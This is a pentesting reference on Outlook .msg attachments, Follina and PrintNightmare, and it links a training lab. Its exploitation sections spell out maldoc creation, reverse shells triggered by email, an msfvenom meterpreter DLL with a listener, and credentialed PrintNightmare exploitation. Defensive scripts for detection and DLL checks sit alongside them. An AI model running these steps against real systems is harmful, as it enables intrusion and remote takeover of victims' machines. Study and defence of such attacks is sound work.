Microsoft Outlook Message (.msg) Pentesting

The .msg file is used to represent individual email messages, appointments, contacts, tasks, and so on in the file system.

# Install the converter (Debian/Ubuntu), then convert the .msg to a plain .eml
sudo apt-get install libemail-outlook-message-perl libemail-sender-perl
msgconvert example.msg
open example.eml


Extract Attached Files

If the message has an attached file, e.g. a .zip, we can extract it.

  1. In CyberChef, paste the Base64-encoded text of the attachment part.

For example,

Content-ID: 
Content-Type: application/octet-stream; name=example.zip
Content-Disposition: attachment; filename=example.zip
Content-Transfer-Encoding: base64

UEsDBBQAAAAIAJBsAVWzNSwXM3oTAAAQ8QANAAAAc2VjdXJpdHkuZXZ0eOxdCXxVxdU/b8nLRhZk
R5aAoqINJISwChISAlSQCEHFUjCQxABJwCTsLnHBtSpabW2t1rpVu1g/97pVa22prRqXKrW0ta1t
...
6Vf33X5WvnNm5rx7373vvnffct97I==
  2. Add the “Base64” and “Extract Files” operations.

After baking, we should get the attached file and download it.
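The same extraction done offline with Python's standard library, as an added example that is not part of the original page: it walks the MIME parts of an .eml, decodes any part marked as an attachment, and checks that the result is really a ZIP before listing its entries. The message is a constructed sample built inside the script (the filename `security.evtx` and the addresses are made up).

```python
import email
import io
import zipfile
from email import policy
from email.message import EmailMessage


def extract_attachments(eml_bytes: bytes) -> dict:
    """Walk every MIME part of an .eml and return {filename: raw bytes} for the
    parts with Content-Disposition: attachment (what the CyberChef recipe does by hand)."""
    msg = email.message_from_bytes(eml_bytes, policy=policy.default)
    found = {}
    for part in msg.walk():
        if part.get_content_disposition() != "attachment":
            continue
        name = part.get_filename() or "unnamed"
        found[name] = part.get_payload(decode=True)  # undoes base64 / quoted-printable
    return found


def zip_members(blob: bytes) -> list:
    """Confirm the blob carries the ZIP magic (PK\\x03\\x04) and list its entries
    in memory, without writing anything to disk."""
    if not blob.startswith(b"PK\x03\x04"):
        return []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return zf.namelist()


def build_sample_eml() -> bytes:
    """Constructed sample: a message carrying a tiny ZIP as a base64 attachment."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("security.evtx", b"constructed placeholder, not a real event log")
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "analyst@example.invalid"
    msg["Subject"] = "constructed sample"
    msg.set_content("see attachment")
    msg.add_attachment(buf.getvalue(), maintype="application",
                       subtype="octet-stream", filename="example.zip")
    return bytes(msg)


if __name__ == "__main__":
    for name, data in extract_attachments(build_sample_eml()).items():
        print(name, len(data), "bytes, zip entries:", zip_members(data))
```

For a real message, read the .eml produced by msgconvert as bytes and pass it to `extract_attachments` instead of `build_sample_eml()`.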

Microsoft Word Pentesting

M365 (Microsoft Office 365) Pentesting

We may spray user passwords with open-source tools as below.

Follina MSDT (CVE-2022-30190)

Microsoft Support Diagnostic Tool (MSDT) is vulnerable to Follina.

  1. Download the Payload to the Local Machine

    Clone the payload from msdt-follina.

  2. Create the Maldoc on the Local Machine

# -i: interface name
python3 follina.py -i eth0

Then a new maldoc named “follina.doc” will be created in the current directory.
Now you’ve started the web server.

  3. Open Another Web Server on the Local Machine

Open another terminal, move to the msdt-follina directory, then start a web server to transfer the maldoc to the target machine.

python3 -m http.server 3456

  4. Transfer the Maldoc to the Target Machine

On the target Windows machine, open PowerShell and execute the following command.

cd ~/Desktop
curl http://<local-ip>:3456/follina.doc -o follina.docx

  5. Open the Maldoc

On the target machine, open the maldoc you transferred.

.\follina.docx

  6. Check Process Explorer (Sysinternals) on the Target Machine

Find interesting processes in Process Explorer.

  7. Check the Event Viewer on the Target Machine to Detect Suspicious Processes

    1. Go to "View" -> "Use Quick Filter".
    2. A search bar should appear on top of the logs. Choose “Find Event ID” on the right of the search bar, and enter “4688” (it means that “a new process has been created”) in the search bar.
    3. Open Find (Ctrl+F) and enter “winword”. Then check the contents of the results.
    4. Go to Options → Advanced Options.

  8. Reverse Shell via SMTP

    If the target uses SMTP, you may be able to get a reverse shell through it.
    Start the exploit to wait for reverse connections.

    sudo python3 follina.py -i tun0 -p 80 -r 4444

    Send an e-mail to the target machine via SMTP using [swaks](https://github.com/jetmore/swaks).

    swaks --to victim@vulnerable.com --from test@test --server mail.vulnerable.com --body "http://<local-ip>/"
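The Event Viewer check above (Event ID 4688, search for “winword”) as a small triage script, added here as an example that is not part of the original page: it flags 4688 records where an Office process launches msdt.exe, or where the command line invokes the ms-msdt: protocol handler Follina abuses. The event records are constructed samples shaped like the fields of a 4688 event, not real logs.

```python
# Fields mirror the 4688 "A new process has been created" event (NewProcessName,
# ParentProcessName and, when command-line auditing is enabled, CommandLine).
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def is_follina_candidate(event: dict) -> bool:
    """Flag a 4688 event where an Office process launches msdt.exe, or where the
    command line invokes the ms-msdt: protocol handler."""
    if event.get("EventID") != 4688:
        return False
    child = _basename(event.get("NewProcessName", ""))
    parent = _basename(event.get("ParentProcessName", ""))
    cmd = event.get("CommandLine", "").lower()
    return (parent in OFFICE_APPS and child == "msdt.exe") or "ms-msdt:" in cmd


def find_follina_candidates(events: list) -> list:
    """Return only the events worth a closer look, preserving log order."""
    return [e for e in events if is_follina_candidate(e)]


# Constructed sample records, not real logs.
SAMPLE_EVENTS = [
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\msdt.exe",
     "ParentProcessName": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "msdt.exe ms-msdt:/id PCWDiagnostic"},  # Word spawning MSDT: hit
    {"EventID": 4688, "NewProcessName": r"C:\Windows\splwow64.exe",
     "ParentProcessName": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": ""},                                     # Word printing: benign
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\msdt.exe",
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "CommandLine": "msdt.exe -id PCWDiagnostic"},            # user-run troubleshooter: benign
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\msdt.exe",
     "ParentProcessName": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": ""},                                     # Excel spawning MSDT: hit
    {"EventID": 4689, "NewProcessName": r"C:\Windows\System32\msdt.exe",
     "ParentProcessName": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": ""},                                     # process exit, not creation
]

if __name__ == "__main__":
    for hit in find_follina_candidates(SAMPLE_EVENTS):
        print(_basename(hit["ParentProcessName"]), "->", _basename(hit["NewProcessName"]))
```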

Windows Print Spooler Service

A service that is running on each computer that participates in the Print Services system. It uses any port between 49152 and 65535. It may be vulnerable to the PrintNightmare (CVE-2021-1675 / CVE-2021-34527).

- [CVE-2021-34527](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527)
- [printnightmarehpzqlp8](https://tryhackme.com/room/printnightmarehpzqlp8)

Investigation

# Check if the Print Spooler service is running
Get-Service -Name Spooler


Detection Services

  1. Open Services.
  2. Find Print Spooler in the right pane.
  3. Double-click it to see the details.

Malicious DLL Location

Check the following directory for unexpected DLLs:

C:\Windows\System32\spool\drivers\x64\3\
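A script to list recently written DLLs under that directory and hash them, so a freshly dropped driver stands out; this is an added example, not code from the original page. The default root is the path above; `demo()` builds a constructed temporary folder (one stale DLL, one fresh DLL, one text file) so the logic can be run anywhere.

```python
import hashlib
import os
import tempfile
import time

# Directory named on the page; demo() uses a temporary folder instead.
SPOOL_DRIVER_DIR = r"C:\Windows\System32\spool\drivers\x64\3"

def sha256_of(path: str) -> str:
    """Hash a file in chunks so large driver packages are not read into memory at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def recent_driver_dlls(root: str = SPOOL_DRIVER_DIR, within_hours: float = 24.0, now: float = None) -> list:
    """Return [(path, sha256, age_hours)] for *.dll files modified inside the window,
    newest first. Sub-directories are walked because the driver store uses numbered subfolders."""
    now = time.time() if now is None else now
    cutoff = now - within_hours * 3600
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".dll"):
                continue
            full = os.path.join(dirpath, name)
            mtime = os.path.getmtime(full)
            if mtime >= cutoff:
                hits.append((full, sha256_of(full), round((now - mtime) / 3600, 2)))
    hits.sort(key=lambda t: t[2])
    return hits

def demo() -> list:
    """Constructed sample tree: one stale DLL, one freshly written DLL, one non-DLL."""
    root = tempfile.mkdtemp(prefix="spool-demo-")
    now = time.time()
    for name, age_days in (("old.dll", 30), ("new.dll", 0), ("notes.txt", 0)):
        path = os.path.join(root, name)
        with open(path, "wb") as f:
            f.write(b"constructed placeholder, not a real driver")
        os.utime(path, (now - age_days * 86400, now - age_days * 86400))
    return recent_driver_dlls(root, within_hours=24, now=now)

if __name__ == "__main__":
    for path, digest, age in demo():
        print(f"{age:>6}h  {digest}  {path}")
```

On a live host call `recent_driver_dlls()` with the default root and compare the hashes against the vendor driver packages you expect to be installed.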

Event Viewer

Open Event Viewer, and find event logs in the following directory in the left pane.
If you want to filter by Event ID, use "Filter Current Log" in the right pane.

Open the .pcap file with Wireshark and filter packets with "smb" or "smb2".


PrintNightmare

This is a remote code execution vulnerability in the Print Spooler service.
It requires authentication (username/password).

  1. Clone the Repository

git clone https://github.com/cube0x0/CVE-2021-1675

  2. Create a Malicious DLL Using Msfvenom

mkdir share
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<local-ip> LPORT=<local-port> -f dll -o ./share/malicious.dll

  3. Start Metasploit and the Reverse TCP Handler

msfconsole

msf > use exploit/multi/handler
msf > set payload windows/x64/meterpreter/reverse_tcp
msf > set lhost <local-ip>
msf > set lport <local-port>

msf > run -j

# Started reverse tcp

msf > jobs

  4. Host the Malicious DLL

impacket-smbserver share ./share/ -smb2support

  5. Check That the Target Meets the Criteria to Exploit It

impacket-rpcdump @<target-ip> | egrep 'MS-RPRN|MS-PAR'
# Protocol: [MS-RPRN]: Print System Remote Protocol
# Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol

  6. Run the Exploit

cd CVE-2021-1675
python3 CVE-2021-1675.py Domain.Controller.local/<username>:<password>@<remote-ip> '\\<local-ip>\share\malicious.dll'

Now we should get a target shell in msfconsole.

  7. Interact with the Target System

Enter the target system via msfconsole.

msf> sessions
msf> sessions -i <session-id>
meterpreter> shell

C:\Windows\system32> whoami


Workarounds

# Disable the Print Spooler service
Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled